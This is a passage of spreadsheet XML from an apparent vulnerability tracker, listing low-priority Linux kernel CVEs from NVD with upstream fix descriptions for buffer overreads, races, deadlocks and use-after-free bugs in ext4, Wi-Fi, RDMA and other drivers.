      <c r="H826" s="5" t="inlineStr"/>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr"/>
      <c r="L826" s="5" t="inlineStr"/>
      <c r="M826" s="5" t="inlineStr"/>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P826" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q826" s="5" t="inlineStr"/>
      <c r="R826" s="5" t="inlineStr"/>
      <c r="S826" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath12k: Avoid buffer overread in ath12k_wmi_op_rx()
Currently, in ath12k_wmi_op_rx(), the firmware buffer is read without
first verifying that the buffer has enough data to hold a header. This
could result in a buffer overread.
Update the logic to verify the buffer contains at least enough data to
hold a wmi_cmd_hdr before reading from the buffer.
Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.1.c7-00108-QCAHMTSWPL_V1.0_V2.0_SILICONZ_UPSTREAM-3</t>
        </is>
      </c>
      <c r="T826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92497</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92498</t>
        </is>
      </c>
      <c r="D827" s="5" t="inlineStr"/>
      <c r="E827" s="5" t="inlineStr"/>
      <c r="F827" s="5" t="inlineStr"/>
      <c r="G827" s="5" t="inlineStr"/>
      <c r="H827" s="5" t="inlineStr"/>
      <c r="I827" s="5" t="inlineStr"/>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr"/>
      <c r="L827" s="5" t="inlineStr"/>
      <c r="M827" s="5" t="inlineStr"/>
      <c r="N827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O827" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P827" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q827" s="5" t="inlineStr"/>
      <c r="R827" s="5" t="inlineStr"/>
      <c r="S827" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath6kl: avoid buffer overreads in WMI event handlers
The following WMI event handlers currently read from the event buffer
without first verifying that the message was large enough to hold the
expected event:
ath6kl_wmi_scan_complete_rx()
ath6kl_wmi_addba_req_event_rx()
ath6kl_wmi_delba_req_event_rx()
Add length checks to prevent overread.</t>
        </is>
      </c>
      <c r="T827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92498</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92499</t>
        </is>
      </c>
      <c r="D828" s="5" t="inlineStr"/>
      <c r="E828" s="5" t="inlineStr"/>
      <c r="F828" s="5" t="inlineStr"/>
      <c r="G828" s="5" t="inlineStr"/>
      <c r="H828" s="5" t="inlineStr"/>
      <c r="I828" s="5" t="inlineStr"/>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr"/>
      <c r="L828" s="5" t="inlineStr"/>
      <c r="M828" s="5" t="inlineStr"/>
      <c r="N828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O828" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P828" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q828" s="5" t="inlineStr"/>
      <c r="R828" s="5" t="inlineStr"/>
      <c r="S828" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: validate readdir offset before accessing dirent
A corrupted directory can trigger the following KASAN report when
ext4_readdir() resumes from an invalid position:
  BUG: KASAN: use-after-free in __ext4_check_dir_entry+0x5ef/0x820
  Read of size 2 at addr ffff88810a646000 by task repro_linear/509
  Call Trace:
   &lt;TASK&gt;
   dump_stack_lvl+0x53/0x70
   print_report+0xd0/0x630
   kasan_report+0xce/0x100
   __ext4_check_dir_entry+0x5ef/0x820
   ext4_readdir+0xcde/0x2b70
   iterate_dir+0x1a1/0x520
   __x64_sys_getdents64+0x12b/0x220
   do_syscall_64+0xf9/0x540
   entry_SYSCALL_64_after_hwframe+0x77/0x7f
   &lt;/TASK&gt;
KASAN reports use-after-free because the out-of-bounds access lands in an
adjacent freed page. The directory buffer itself is still referenced.
ext4_dir_llseek() invalidates the directory cookie so that ext4_readdir()
rescans directory entries from the start of the block. The rescan checks
only the lower bound of rec_len before advancing. A corrupted rec_len can
therefore place the offset where the block has insufficient space for a
complete directory entry. The rescan itself may dereference that truncated
entry, or the main loop may pass it to __ext4_check_dir_entry(). The latter
reads de-&gt;rec_len before validating the range. For example:
  block offset  0                           4092  4096
                |---- de1.rec_len = 4092 -----|----|
                                               de2.inode
                                                    | de2.rec_len
                                                    ^ OOB, reported as UAF
de2 starts at offset 4092 in this 4 KiB block. Its four-byte inode fits in
the block, but its rec_len starts at offset 4096 and crosses the boundary.
The minimum safe length is inode-dependent. Encrypted and casefolded
directory entries need eight additional hash bytes, while a valid metadata
checksum tail is only 12 bytes.
Cache the metadata checksum feature state and derive the minimum directory
entry length from the on-disk format. Use it to bound both the rescan and
the offset passed to the main loop. Report an offset in a truncated block
tail and skip the remainder of the block, while continuing to accept an
offset exactly at the block boundary.</t>
        </is>
      </c>
      <c r="T828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92499</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92500</t>
        </is>
      </c>
      <c r="D829" s="5" t="inlineStr"/>
      <c r="E829" s="5" t="inlineStr"/>
      <c r="F829" s="5" t="inlineStr"/>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="inlineStr"/>
      <c r="I829" s="5" t="inlineStr"/>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr"/>
      <c r="L829" s="5" t="inlineStr"/>
      <c r="M829" s="5" t="inlineStr"/>
      <c r="N829" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O829" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P829" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q829" s="5" t="inlineStr"/>
      <c r="R829" s="5" t="inlineStr"/>
      <c r="S829" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: use fsdata to track inline data write state and fix race
Instead of checking the live inode state (ext4_has_inline_data(inode)
and ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA)) in the
write_end handlers, use the fsdata parameter of the address space
operations to explicitly pass down the state in which write_begin
prepared the write.
A concurrent thread (such as ext4_page_mkwrite()) can convert the
inline data to an extent between write_begin and write_end. If this
happens, the write_end handlers would previously miss the inline
write_end path and fall through to extent-based write_end logic.
However, since block buffers were never allocated in write_begin,
this resulted in NULL pointer dereferences or data loss because
folio_buffers(folio) was NULL.
Define EXT4_WRITE_DATA_INLINE (4) as a bit flag (Bit 2), treating
fsdata as bitwise flags rather than mutually exclusive enums to keep
states of the write path independent. Communicate this state via
fsdata:
1) ext4_write_begin() and ext4_da_write_begin() set the
   EXT4_WRITE_DATA_INLINE bit in *fsdata via bitwise OR when an inline
   write is successfully prepared.
2) On entry, ext4_write_begin() clears the EXT4_WRITE_DATA_INLINE bit
   to safely handle VFS retries (where generic_perform_write() bypasses
   the fsdata initialization on its retry jump).
3) The write_end handlers perform a bitwise AND to check if the
   EXT4_WRITE_DATA_INLINE bit is set and invoke the inline write_end
   helper accordingly.
Furthermore, during a buffered write, ext4_write_inline_data_end()
acquires the xattr lock after preparing the write. If a concurrent
page fault (ext4_page_mkwrite()) converts the inline data to an extent
after the write_end handlers check the state but before
ext4_write_inline_data_end() acquires the xattr write lock, the
subsequent check will trigger a kernel panic via
BUG_ON(!ext4_has_inline_data(inode)).
To keep git history working and bisectability clean, replace the
BUG_ON check in ext4_write_inline_data_end() with a graceful error-
handling retry path in this same commit. If the inline data is cleared
after locking the xattr, we safely release all resources (releasing
iloc.bh, unlocking/putting the folio, stopping the active journal
transaction handle) and return 0 (VFS retry) to let the generic write
path retry the operation safely.</t>
        </is>
      </c>
      <c r="T829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92500</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92501</t>
        </is>
      </c>
      <c r="D830" s="5" t="inlineStr"/>
      <c r="E830" s="5" t="inlineStr"/>
      <c r="F830" s="5" t="inlineStr"/>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="inlineStr"/>
      <c r="I830" s="5" t="inlineStr"/>
      <c r="J830" s="5" t="inlineStr"/>
      <c r="K830" s="5" t="inlineStr"/>
      <c r="L830" s="5" t="inlineStr"/>
      <c r="M830" s="5" t="inlineStr"/>
      <c r="N830" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O830" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P830" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q830" s="5" t="inlineStr"/>
      <c r="R830" s="5" t="inlineStr"/>
      <c r="S830" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: drain in-flight DIO before buffered write fallback
generic/746 started failing intermittently on ext3 (no-extent inodes).
The test triggers 'Page cache invalidation failure on direct I/O'
warnings and subsequent fsync returns -EIO. Adding a 50ms delay
between ext4_buffered_write_iter() and filemap_write_and_wait_range()
in ext4_dio_write_iter() makes the race almost always reproducible.
On no-extent inodes, DIO writes to holes cannot use unwritten extents,
so ext4_iomap_alloc() leaves m_flags=0 and ext4_map_blocks() returns 0.
The iomap layer then returns -ENOTBLK, causing fallback to buffered I/O.
The fallback path in ext4_dio_write_iter() calls
ext4_buffered_write_iter() which dirties pages, then does flush and
invalidate. However, there's an unprotected window between
ext4_buffered_write_iter() returning (with inode lock released) and
the subsequent flush+invalidate.
Concurrent async DIO completions from other threads can run
kiocb_invalidate_post_direct_write() during this window. If pages have
been re-dirtied, post-invalidation finds dirty pages and triggers the
warning, setting -EIO in the error sequence.
Consider a file with two 4k extents: [hole][written]. Thread A does
DIO to the written extent, while thread B does DIO spanning both:
  kworker A (4k DIO, allocated block)    kworker B (8k DIO, fallback)
  -----------------------------------    ----------------------------
  inode_lock_shared()                    inode_lock_shared()
  iomap_dio_rw():                        iomap_dio_rw():
    kiocb_invalidate_pages -&gt; clean        iomap_begin -&gt; -ENOTBLK
    submit_bio (async)                     dio-&gt;size = 0
  inode_unlock_shared()                  inode_unlock_shared()
  [bio pending in block layer]           /* fallback: lock released */
                                         ext4_buffered_write_iter()
                                           inode_lock(exclusive)
                                           generic_perform_write()
                                             -&gt; dirty pages [0, 8k]
                                           inode_unlock(exclusive)
                                         /* pages dirty, no lock */
  [bio completes]                        filemap_write_and_wait_range()
  iomap_dio_complete()                     -&gt; flush dirty pages
    kiocb_invalidate_post_direct_write() invalidate_mapping_pages()
      invalidate_inode_pages2_range()
      -&gt; finds dirty page!
      -&gt; dio_warn_stale_pagecache()
      -&gt; errseq_set(-EIO)
This issue can be triggered through normal I/O paths, not just
intentionally overlapping DIO writes from userspace. For example,
generic/746 uses a loop device where multiple kworkers issue concurrent
I/O to the backing file. Additionally, when block_size &lt; folio_size,
non-overlapping DIO writes that share a large folio can also trigger
the race.
Add inode_dio_wait() in ext4_buffered_write_iter() before
ext4_write_checks() to drain all in-flight DIO. This ensures that
all DIO clears existing pages before submitting IO (via
kiocb_invalidate_pages()), all BIO waits for all DIO to complete
(via inode_dio_wait()), and ext4_write_checks() observes the inode
size after all completed DIO so that ext4_block_zero_eof() does not
race with in-flight DIO, thus eliminating the race.</t>
        </is>
      </c>
      <c r="T830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92501</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92502</t>
        </is>
      </c>
      <c r="D831" s="5" t="inlineStr"/>
      <c r="E831" s="5" t="inlineStr"/>
      <c r="F831" s="5" t="inlineStr"/>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="inlineStr"/>
      <c r="I831" s="5" t="inlineStr"/>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr"/>
      <c r="L831" s="5" t="inlineStr"/>
      <c r="M831" s="5" t="inlineStr"/>
      <c r="N831" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O831" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P831" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q831" s="5" t="inlineStr"/>
      <c r="R831" s="5" t="inlineStr"/>
      <c r="S831" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: clear stale xarray tags on folios skipped during writeback
In data=journal mode, the writeback thread can hit the
WARN_ON_ONCE(sb_rdonly(sb)) in ext4_journal_check_start() while the
superblock is being remounted read-only during reboot:
Workqueue: writeback wb_workfn (flush-253:0)
RIP: 0010:ext4_journal_check_start+0x8b/0xd0
Call Trace:
  __ext4_journal_start_sb+0x3c/0x1e0
  mpage_prepare_extent_to_map+0x4af/0x580
  ext4_do_writepages+0x3c0/0x1080
  ext4_writepages+0xc8/0x1a0
  do_writepages+0xc4/0x180
  __writeback_single_inode+0x45/0x2f0
  writeback_sb_inodes+0x26b/0x5d0
  __writeback_inodes_wb+0x54/0x100
  wb_writeback+0x1ac/0x320
  wb_workfn+0x394/0x470
And followed by the warning:
EXT4-fs warning (device vda1): ext4_evict_inode:195: inode #6263:
comm (sd-umount): data will be lost
This issue is not reproduced every time, but frequently.
The reproduction step is to create a VM with 8 CPUs, 16G memory and
setup data=journal:
sudo tune2fs -o journal_data /dev/vda1
Run fio:
rm -f fiotest
fio --name=fiotest --rw=randwrite --bs=4k --runtime=6 --ioengine=libaio
--iodepth=256 --numjobs=8 --filename=fiotest --filesize=30G
--group_reporting
Reboot the VM, and check the console output from:
virsh console testvm
But there is no dirty inode, folio_clear_dirty_for_io clears PG_dirty
but leaves tags PAGECACHE_TAG_DIRTY and PAGECACHE_TAG_TOWRITE set which
are only cleared by __folio_start_writeback.
In data=journal mode, jbd2 checkpoints the journalled data to its final
location and clears its own dirty flag without touching folio PG_dirty
or xarray dirty flags.
The commit f4a2b42e7891 ("ext4: fix stale xarray tags after writeback")
fixes when PG_dirty is still set but there is no dirty page.
Another case is PG_dirty is cleared, but PAGECACHE_TAG_DIRTY and
PAGECACHE_TAG_TOWRITE is still set. In this case, writeback thread
checks clean folio and skips it in mpage_prepare_extent_to_map:
if (!folio_test_dirty(folio) ||
    ...
        folio_unlcok(folio);
	continue
And never reaches ext4_bio_write_folio where the commit f4a2b42e7891
clears the stale xarray tags. Print debug logs after the filesystem
is remounted read-only:
writepages RDONLY nrpages=2048 dirtytag=1 wbtag=0 towrite=1 sync=0
And all folios are actually clean:
folio idx=3 dirty=0 wb=0 checked=0 dirtybuf=0 jbddirty=0 mapped=1
...
We need to clear the xarray stale tags for such clean folios by
cycling them through writeback in the skip path, the same way
f4a2b42e7891 does in ext4_bio_write_folio.</t>
        </is>
      </c>
      <c r="T831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92502</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92503</t>
        </is>
      </c>
      <c r="D832" s="5" t="inlineStr"/>
      <c r="E832" s="5" t="inlineStr"/>
      <c r="F832" s="5" t="inlineStr"/>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="inlineStr"/>
      <c r="I832" s="5" t="inlineStr"/>
      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr"/>
      <c r="L832" s="5" t="inlineStr"/>
      <c r="M832" s="5" t="inlineStr"/>
      <c r="N832" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O832" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P832" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q832" s="5" t="inlineStr"/>
      <c r="R832" s="5" t="inlineStr"/>
      <c r="S832" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: fix ABBA deadlock in ext4_xattr_inode_cache_find()
Syzbot/stress-ng reported an ABBA deadlock in ext4 when exercising
concurrent xattr workloads (using the ea_inode mount/format option).
The deadlock occurs between the running transaction and the eviction
thread:
- Task 1 (stress-ng): Holds a reference to a shared mbcache_entry (ce)
  and calls ext4_xattr_inode_cache_find() -&gt; ext4_iget() to retrieve
  the corresponding EA inode. Since the EA inode is currently being
  evicted, ext4_iget() blocks in __wait_on_freeing_inode() waiting for
  eviction to complete.
- Task 2 (eviction thread): Currently evicting the same EA inode in
  ext4_evict_ea_inode(). It calls mb_cache_entry_wait_unused(oe) which
  blocks waiting for Task 1 to release the reference to the mbcache_entry.
To break this deadlock, implement a new ext4_iget() configuration flag
named EXT4_IGET_NOWAIT. When set, perform a non-blocking lookup of the
inode via VFS's find_inode_nowait() API.
If the inode is currently being evicted (marked with I_FREEING or
I_WILL_FREE) or created (I_CREATING), or if it is not present in the VFS
inode cache (cache miss), simply skip it (returning -ENOENT) rather than
waiting for eviction/creation to complete, breaking the ABBA cycle.
Since we return -ENOENT immediately on a cache miss, we never attempt to
allocate a new inode or call iget_locked(), completely eliminating any
TOCTOU race window.
If the returned inode is I_NEW, wait for its initialization to clear via
wait_on_new_inode(). If initialization fails and the inode is unhashed
during wait_on_new_inode() waking up (e.g., due to an I/O read error in
another thread), safely drop the reference and return -ENOENT. This
unhashed check is executed unconditionally on all cache-hit pathways to
properly handle concurrent initialization failures.
Finally, standard validation checks (including is_bad_inode,
EXT4_EA_INODE_FL, file_acl, and xattr flags) are executed as normal inside
check_igot_inode() to fully guarantee VFS-layer safety.
In ext4_xattr_inode_cache_find(), invoke ext4_iget() with the new
EXT4_IGET_NOWAIT flag to perform the non-blocking cache search.</t>
        </is>
      </c>
      <c r="T832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92503</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92504</t>
        </is>
      </c>
      <c r="D833" s="5" t="inlineStr"/>
      <c r="E833" s="5" t="inlineStr"/>
      <c r="F833" s="5" t="inlineStr"/>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="inlineStr"/>
      <c r="I833" s="5" t="inlineStr"/>
      <c r="J833" s="5" t="inlineStr"/>
      <c r="K833" s="5" t="inlineStr"/>
      <c r="L833" s="5" t="inlineStr"/>
      <c r="M833" s="5" t="inlineStr"/>
      <c r="N833" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O833" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P833" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q833" s="5" t="inlineStr"/>
      <c r="R833" s="5" t="inlineStr"/>
      <c r="S833" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
thermal: intel: int3400: clean up ODVP on probe failures
evaluate_odvp() creates per-ODVP sysfs files before the thermal zone
and later probe resources are registered. The current unwind path only
calls cleanup_odvp() from the late sysfs failure path, so failures after
evaluate_odvp() but before that label, including
thermal_tripless_zone_device_register() failures, leave the ODVP files
and storage behind.
Move the ODVP cleanup to the common ART/TRT unwind path so every failure
after evaluate_odvp() releases the ODVP state. Also clear the cached
ODVP pointers in cleanup_odvp(), because evaluate_odvp() can already call
it for partial setup failures while probe continues.</t>
        </is>
      </c>
      <c r="T833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92504</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92505</t>
        </is>
      </c>
      <c r="D834" s="5" t="inlineStr"/>
      <c r="E834" s="5" t="inlineStr"/>
      <c r="F834" s="5" t="inlineStr"/>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="inlineStr"/>
      <c r="I834" s="5" t="inlineStr"/>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr"/>
      <c r="L834" s="5" t="inlineStr"/>
      <c r="M834" s="5" t="inlineStr"/>
      <c r="N834" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O834" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P834" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q834" s="5" t="inlineStr"/>
      <c r="R834" s="5" t="inlineStr"/>
      <c r="S834" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Fix undefined behavior in devid_write debugfs function
When for_each_pci_segment() loop completes without finding a matching
segment, the pci_seg pointer is not NULL but points to an invalid memory
location (the list head). Accessing pci_seg-&gt;id after the loop causes
undefined behavior.
Fix this by handling the successful case inside the loop and returning
-EINVAL after the loop if no matching segment is found.</t>
        </is>
      </c>
      <c r="T834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92505</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92506</t>
        </is>
      </c>
      <c r="D835" s="5" t="inlineStr"/>
      <c r="E835" s="5" t="inlineStr"/>
      <c r="F835" s="5" t="inlineStr"/>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="inlineStr"/>
      <c r="I835" s="5" t="inlineStr"/>
      <c r="J835" s="5" t="inlineStr"/>
      <c r="K835" s="5" t="inlineStr"/>
      <c r="L835" s="5" t="inlineStr"/>
      <c r="M835" s="5" t="inlineStr"/>
      <c r="N835" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O835" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P835" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q835" s="5" t="inlineStr"/>
      <c r="R835" s="5" t="inlineStr"/>
      <c r="S835" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Fix requested device removal race
scmi_protocol_device_unrequest() drops scmi_requested_devices_mtx while
notifying listeners but continues to retain the per-protocol list head.
When two SCMI drivers for the same protocol unregister concurrently, one
thread can remove the final request and free the list head while the other
is running its notifier. The latter then dereferences the freed list head
after reacquiring the mutex and can free it a second time.
Complete the list and IDR updates, including freeing an empty list head,
before dropping the mutex. Keep the blocking notifier outside the critical
section and retain only the detached request across the callback.</t>
        </is>
      </c>
      <c r="T835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92506</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92507</t>
        </is>
      </c>
      <c r="D836" s="5" t="inlineStr"/>
      <c r="E836" s="5" t="inlineStr"/>
      <c r="F836" s="5" t="inlineStr"/>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="inlineStr"/>
      <c r="I836" s="5" t="inlineStr"/>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr"/>
      <c r="L836" s="5" t="inlineStr"/>
      <c r="M836" s="5" t="inlineStr"/>
      <c r="N836" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O836" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P836" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q836" s="5" t="inlineStr"/>
      <c r="R836" s="5" t="inlineStr"/>
      <c r="S836" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in ib_dealloc_pd_user()
When accessing a PD via the netlink path the only synchronization
mechanism for the said PD is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
ib_dealloc_pd_user(), which is too late, since by that point
vendor-specific resources associated with the PD might already be
freed. This can leave a short window where the PD remains accessible
through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_begin_del() call to the start of
ib_dealloc_pd_user(), ensuring that the PD is removed from restrack
before its internal resources are released. This guarantees that no new
users hold references to a PD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836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92507</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92508</t>
        </is>
      </c>
      <c r="D837" s="5" t="inlineStr"/>
      <c r="E837" s="5" t="inlineStr"/>
      <c r="F837" s="5" t="inlineStr"/>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="inlineStr"/>
      <c r="I837" s="5" t="inlineStr"/>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr"/>
      <c r="L837" s="5" t="inlineStr"/>
      <c r="M837" s="5" t="inlineStr"/>
      <c r="N837" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O837" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P837" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q837" s="5" t="inlineStr"/>
      <c r="R837" s="5" t="inlineStr"/>
      <c r="S837" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Fix potential use after free in ib_free_cq()
When accessing a CQ via the netlink path the only synchronization
mechanism for the said CQ is rdma_restrack_get().
Currently, rdma_restrack_del() is invoked at the end of
ib_free_cq(), which is too late, since by that point
vendor-specific resources associated with the CQ might already be
freed. This can leave a short window where the CQ remains accessible
through restrack, leading to a potential use-after-free.
Fix this by moving the rdma_restrack_del() call to be before the freeing
of the vendor-specific resources ensuring that the CQ is removed from
restrack before its internal resources are released.
This guarantees that no new users hold references to a CQ that is in
the process of destruction.</t>
        </is>
      </c>
